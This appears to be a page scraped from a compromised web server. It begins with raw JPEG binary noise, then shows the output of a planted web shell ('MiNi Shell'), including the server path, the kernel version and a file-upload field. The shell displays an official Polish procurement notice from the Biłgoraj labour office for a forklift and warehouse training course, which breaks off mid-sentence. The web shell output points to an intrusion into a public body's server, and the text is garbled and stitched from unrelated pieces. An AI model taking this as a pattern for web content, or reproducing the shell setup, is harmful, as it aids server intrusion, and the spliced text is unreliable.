JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250505/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250505/0021526201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Szkolenie grupowe: „Magazynier z obsługą wózków jezdniowych podnośnikowych z mechanicznym napędem podnoszenia z wysięgnikiem oraz wózków jezdniowych podnośnikowych z mechanicznym napędem (…)” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY URZĄD PRACY W BIŁGORAJU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950031692</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bohaterów Monte Cassino 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Biłgoraj</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">846850000</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pupbilgoraj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://pup.bilgoraj.ibip.pl/public/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Szkolenie grupowe: „Magazynier z obsługą wózków jezdniowych podnośnikowych z mechanicznym napędem podnoszenia z wysięgnikiem oraz wózków jezdniowych podnośnikowych z mechanicznym napędem (…)” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-68066f8f-99f7-4fc7-a8b1-a127386dee2b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00215262</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00092184/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Szkolenie grupowe: Magazynier z obsługą wózków jezdniowych podnośnikowych z mechanicznym napędem podnoszenia z wysięgnikiem oraz wózków jezdniowych podnośnikowych z mechanicznym napędem (...)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-68066f8f-99f7-4fc7-a8b1-a127386dee2b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy <br/>e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w<br/>zakładce „Centrum Pomocy”. Wykonawca zobowiązany jest zapoznać się z w/w Regulaminem i postępować wg zasad w nim<br/>wskazanych dedykowanych dla Wykonawcy. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę<br/>akceptuje zasady korzystania z Platformy e-Zamówienia wskazane w Regulaminie i SWZ. Przeglądanie i pobieranie publicznej treści<br/>dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej<br/>w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporz. Prezesa Rady Ministrów w<br/>sprawie wymagań dla dokumentów elektronicznych (patrz pkt 1.3 ppkt 9 SWZ).<br/>Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporz. Rady<br/>Ministrów w sprawie Krajowych Ram Interoperacyjności (patrz pkt 1.3 ppkt 10 SWZ), z uwzględnieniem rodzaju przekazywanych<br/>danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą<br/>miały bezpośredniego zastosowania.<br/>Informacje, oświadczenia lub dokumenty inne niż wymienione w § 2 ust. 1 rozporz. Prezesa RM w sprawie wymagań dla<br/>dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>1) w formatach danych określonych w przepisach rozporządzenia RM w sprawie Krajowych Ram Interoperacyjności (i przekazuje się<br/>jako załącznik), lub<br/>2) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>Zamawiający preferuje w szczególności następujące formaty przesłanych danych: .pdf, .docx, zip.<br/>Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dn. 16.04.1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022<br/>r. poz. 1233) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym<br/>pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do<br/>komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa RM w sprawie wymagań dla dokumentów<br/>elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być<br/>opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). Ciąg dalszy w Sekcji IX Pozostałe informacje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporz Parlamentu Europejskiego i Rady (UE) 2016/679 z<br/>dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporz. o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016), dalej „RODO”, zamawiający realizując obowiązek informacyjny wobec osób, których dane pozyskuje w toku<br/>prowadzonego postępowania, informuje, że: 1)administratorem Pani/Pana danych osobowych jest: Powiatowy Urząd Pracy w<br/>Biłgoraju z siedzibą przy ul. Bohaterów Monte Cassino 38, 23 - 400 Biłgoraj, reprezentowany przez Dyrektora PUP. Numer tel.: 84<br/>6850000, fax 84 6861671, adres email: pupbilgoraj@pupbilgoraj.pl 2)inspektorem ochrony danych w PUP w Biłgoraju jest Pan<br/>Janusz Małek. Dane kontaktowe: adres siedziby PUP, numer tel.: 84 6850000, fax 84 6861671, email: iod@pupbilgoraj.pl<br/>3)dane osobowe Wykonawcy przetwarzane będą na podst. art. 6 ust. 1 lit. c RODO w celu prowadzenia post. o udzielenie zam.<br/>publicznego prowadzonego na podst. art. 275 pkt 1 w związku z art 359 pkt 2 ustawy z dnia 11 września 2019r. Pzp(Dz. U. z 2024r.<br/>poz. 1320), którego przedmiotem jest usługa społ. pn.: Szkolenie grupowe: „Magazynier z obsługą wózków jezdniowych podnośnikowych z mechanicznym napędem podnoszenia z wysięgnikiem oraz wózków jezdniowych podnośnikowych z mechanicznym napędem (…)” oraz zawarcia umowy na realizację zamówienia;<br/>4)odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ustawy Pzp; 5)dane<br/>osobowe Wykonawcy będą przechowywane przez okres niezbędny do realizacji wskazanego w pkt 3 celu przetwarzania jednak nie<br/>krócej niż przez okres wynikający z przepisów ustawy Pzp oraz obowiązujących w PUP przepisów kancelaryjno–archiwalnych;<br/>6)obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zam. publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>7)w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do<br/>art.22 RODO;<br/>8)Wykonawca posiada: a)na podst. art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy; b)na podstawie<br/>art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie<br/>zam. publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności<br/>protokołu oraz jego załączników; c)na podst. art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; d)prawo do wniesienia skargi do Prezesa UODO,<br/>gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO; 9)Wykonawcy nie przysługuje: a)w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; b)prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO; c)na podst. art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OA.2710.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa organizacji grupowego szkolenia dla 10 osób bezrobotnych „Magazynier z obsługą wózków jezdniowych podnośnikowych z mechanicznym napędem podnoszenia z wysięgnikiem oraz wózków jezdniowych podnośnikowych z mechanicznym napędem podnoszenia z osobą obsługującą podnoszoną wraz z ładunkiem”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów<br/>oceny ofert:<br/>1) całkowity koszt szkolenia (cena) – 60 %,<br/>2) dostosowanie doświadczenia kadry dydaktycznej do zakresu szkolenia - 40%.<br/>Szczegółowy opis kryteriów, którymi zamawiający będzie się kierował przy wyborze oferty, wraz z podaniem wag tych kryteriów i<br/>sposobu oceny ofert został określony w rozdziale 16 SWZ.<br/>Zamawiający będzie obliczał punktację w poszczególnych kryteriach z dokładnością do dwóch miejsc po przecinku, zaokrąglając<br/>wynik zgodnie z zasadami matematycznymi określonymi w pkt 15.8 SWZ. Ostateczna liczba punktów danej oferty wynikać będzie z<br/>sumy punktów otrzymanych w poszczególnych kryteriach. Oferta, która uzyska łącznie najwięcej punktów stanowiących sumę<br/>punktów otrzymanych w poszczególnych kryteriach zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostosowanie doświadczenia kadry dydaktycznej do zakresu szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z pkt 6.1 SWZ: &#34;6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu:<br/>6.1.1. zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w w/w zakresie.<br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów;<br/>Warunkiem udziału w postępowaniu jest posiadanie przez wykonawcę aktualnego wpisu do rejestru instytucji szkoleniowych<br/>prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ust.<br/>1 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2025r. poz. 214 z późn. zm.).<br/>Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, o którym mowa w pkt 8.1 SWZ. Oświadczenie<br/>należy złożyć wg wzoru określonego w załączniku nr 3 do SWZ. Zamawiający zweryfikuje w Rejestrze Instytucji<br/>Szkoleniowych dostępnym na stronie www.ris.praca.gov.pl czy Wykonawca ubiegający się o realizację zamówienia jest<br/>wpisany do rejestru instytucji szkoleniowych i posiada aktualny wpis.<br/>6.1.3. sytuacji ekonomicznej lub finansowej: Zamawiający nie określa warunku w w/w zakresie.<br/>6.1.4. zdolności technicznej lub zawodowej:<br/>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, iż:<br/>1) posiada wiedzę i doświadczenie w świadczeniu usług szkoleniowych tj.: w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 2<br/>szkolenia grupowe dla co najmniej 5 osób każde.<br/>Przez szkolenie grupowe należy rozumieć szkolenie, w którym uczestniczyło co najmniej 5 osób szkolonych w tym samym miejscu i w tym samym okresie, przeszkolonych w ramach jednej umowy, realizowanej dla jednej instytucji/ podmiotu.<br/>2) dysponuje lub będzie dysponować kadrą dydaktyczną tj. co najmniej jedną osobą, która będzie uczestniczyć w wykonaniu<br/>zamówienia, która posiada doświadczenie niezbędne do wykonania zamówienia.<br/>Przez doświadczenie zawodowe niezbędne do wykonania zamówienia należy rozumieć przeprowadzenie w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert co najmniej 2 szkoleń lub bloków tematycznych o tematyce związanej<br/>merytorycznie z przedmiotem zamówienia oraz wykonywanymi czynnościami w zamówieniu.<br/>Liczba osób wykonujących zamówienie musi być taka, aby zapewnić należytą i terminową realizację przedmiotu<br/>zamówienia.<br/>W przypadku wskazania dwóch lub więcej osób do realizacji zamówienia każda ze wskazanych osób musi spełniać warunek<br/>postawiony wobec kadry dydaktycznej.&#34;<br/>Zgodnie z pkt 6.2. i 6.3. SWZ:<br/>&#34;6.2. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w<br/>art. 112 ust. 2 pkt 2 ustawy Pzp, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i<br/>zrealizuje usługi, do których realizacji te uprawnienia są wymagane (art. 117 ust. 2 ustawy Pzp).<br/>6.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane (art. 117 ust. 3<br/>ustawy Pzp).&#34;<br/>Zgodnie z pkt 6.4. i 6.5. SWZ: &#34;6.4. Zgodnie z art. 118 ustawy Pzp wykonawca może w celu potwierdzenia spełniania<br/>warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego<br/>części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów<br/>udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. (Patrz rozdział 9<br/>SWZ).<br/>6.5. Sposób wykazania warunków udziału w postępowaniu wskazano w rozdziale 8 SWZ.&#34; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia<br/>wezwania) następujących podmiotowych środków dowodowych i oświadczeń (aktualnych na dzień złożenia): 1) Zgodnie z pkt 8.4.2.<br/>SWZ: &#34;W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu o udzielenie zamówienia, wykonawca<br/>zobowiązany jest do złożenia oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego w SWZ (patrz pkt 8.1<br/>SWZ). Wzór oświadczenia stanowi załącznik nr 8 do SWZ. Przepis stosuje się odpowiednio do podmiotów udostępniających zasoby,<br/>w przypadku gdy wykonawca polega na zdolnościach tych 